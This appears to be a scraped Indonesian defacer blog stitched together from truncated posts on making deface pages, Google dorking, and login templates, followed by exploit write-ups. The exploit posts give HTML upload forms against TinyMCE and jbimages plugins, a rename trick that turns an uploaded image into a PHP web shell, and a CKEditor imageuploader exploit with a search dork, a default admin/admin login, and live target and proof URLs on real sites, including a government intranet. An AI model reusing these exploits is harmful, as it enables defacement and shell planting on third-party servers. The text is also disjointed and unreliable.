Alwdy

Haii guys balik lagi dengan gue Fakhri, pada kesempatan kali ini saya ingin membagikan tutorial bagaimana membuat script deface kita sendiri, biar kita bisa membuktikan hasil karya kita dari pada copas orang punya karya hahaha.. Okeh langsung sja kita masuk pada tutorial. Bahan : 1. Notepad / Notepad++ / Sublime Text atau terserah kalian yang penting aplikasi teks editor. Langkah-langkah : 1. Buka Notepad kalian atau tidak aplikasi teks editor yang kalian miliki 2. Pada dasarnya HTML memiliki bentuk dasar seperti ini : 3. Copy code di bawah ini dan pastekan di notepad kalian kemudian simpan dalam format .html : Maka hasilnya akan seperti ini : Keterangan : Pada bagian <title> gantilah tulisan (Nama Underground Lu) dengan nama underground anda. Selanjutnya untuk bagian <iframe> gantilah tulisan llxt1iLUK6c dengan link lagu kalian yang ada di youtube. Contohnya seperti ini :   https://www.youtube.com/watch?v= llxt1iLUK6c  Ambil lah 10 huruf terakhir dar...

Pada kesempatan kali ini saya akan menjelaskan apa itu Google Dork (Dorking) dalam dunia Defacer, yang memudahkan bagi para Defacer dalam melakukan pencarian dalam menemukan kelemahan suatu website. Pengertian Google Dork (Dorking) : Dalam pengertian Google Dork ini mari kita bagi menjadi 2 yaitu : 1. Google Pasti dari kalian sudah tau apa itu google kan ? yapss benar sekali, Google adalah salah satu raksasa mesin pencari memiliki algoritma yang cukup rumit dalam search enginenya. Bagi kalian yang sering menggunakan google pasti menggunakannya untuk mencari sesuatu entah lowongan pekerjaan, download dokumen, berita terbaru dan lain sebagainya. 2. Dork Sebenarnya merupakan salah satu dari aktivitas yang sobat lakukan dengan Google. Sayangnya dengan adanya dork ini membuat begitu mudahnya seseorang untuk melakukan aktivitas illegal. Setiap algoritma Google akan menempatkan atau mengindeks semua halaman website di dunia tanpa terkecuali. Namun faktanya Google Dork ini digunakan 80% untuk...

Dalam artikel kali ini saya akan menjelaskan kepada kalian apa itu Deface dan apa-apa saja yang diperlukan dalam melakukan Deface ini, Oke mari langsung saja kita masuk pada pembahasan. Pengertian Deface : Kata Deface yang berdasarkan dalam kamus Umum yang berarti merusakkan, mencemarkan, menggoresi, menghapuskan tetapi arti kata deface disini yang sangat lekat adalah sebagai salah satu kegiatan merubah tampilan suatu website baik halaman utama atau index filenya ataupun halaman lain yang masih terkait dengan url website tersebut (bisa di folder atau di file). Deface adalah teknik mengganti atau menyisipkan file ke dalam server, teknik ini dapat dilakukan karena terdapat celah yang berada di website tersebut. Hal ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh di Defacer (Sebutan bagi orang yang melakukan deface). Para Defacer biasanya meninggalkan pesan dan nickname mereka agar hasil kerjanya diketahui oleh anggota hacker lainny...

Template halaman login yang menarik tentu akan bisa memberikan sebuah kesan tersendiri bagi pemakai aplikasi Anda. Mereka bisa mendapatkan pengalaman menggunakan aplikasi yang menyenangkan apabila saat pertama kali mengakses aplikasi milik Anda yang memulai dengan halaman login yang keren. Sebuah aplikasi tanpa halaman login rasanya tidak mungkin, halaman ini pasti diperlukan demi keamanan website yang dibuat. Bagi Anda yang sedang merancang sebuah sistem aplikasi berbasis website yang memerlukan halaman login, berikut ini ada beberapa contoh halaman login yang keren dan bisa Anda gunakan. WordPress Login Customizer Download Creative Login Form Download         Preview Login Form 1 by Colorlib Download         Preview Login Form 2 by Colorlib Download         Preview Login Form 3 by Colorlib Download         Preview Login Form 4 by Colorlib Download         Preview Login Form 5 by Color...

Author : Khuneable  Anti burp y  :D CSRF <form enctype="multipart/form-data" action="sitecom/tinymce/plugins/image/upload.php" method="post"> <input type="file" name="upl" multiple="multiple"> <input type="submit" value="Proccess!"> </form> Upload shell bentuk gambar dlu ya terus next dibawah Setelah upload sitecom/path/tinymce/plugins/image/rename_file.php?current_name=namafilesebelumdiganti.php.jpg&new_name=namafilebaru.php CSRF Online : https://www.exploit.sultra1news.com/csrf.php Live : http://azyb.az/admin/media/tinymce/plugins/image/upload.php Shell : sitecom/path/tinymce/plugins/image/rename_file.php?current_name=namafilesebelumdiganti.php.jpg&new_name=namafilebaru.php

Exploit jBImages Tinymce POC : sitecom/path/tinymce/plugins/jbimages/ci/index.php?upload/english CSRF: <form enctype="multipart/form-data" action="sitecom/path/tinymce/plugins/jbimages/ci/index.php?upload/english" method="post"> <input type="file" name="userfile" multiple="multiple"> <input name="upload_target" value="./"> <input type="submit" value="josskan!"> </form> Shells uploaded : ??? Demo :  Here Files uploaded :  http://calptower.org/images/hacked.jpg Typical Idiot Security Greet's : Zerobyte.ID - IndoXploit 

# Author : SPEEDY-03 # Exploit Title : ImageBrowser FileUpload Vulnerabillity # Date 05/26/2018 # Tested On Windows 7 # Greetz : Typical idiot Security & ZeroByte.id =============================================== * Demo :  http://intranet.kemendag.go.id/modules/itpc/ * Default Login : admin/admin * Dork : /ckeditor/plugins/imageuploader/uploads/ * Exploit : /ckeditor/plugins/imageuploader/imgbrowser.php * Proof :  http://intranet.kemendag.go.id//6242d094.jpg NB : EXPLOIT INI HANYA BISA UPLOAD .JPG / IMAGE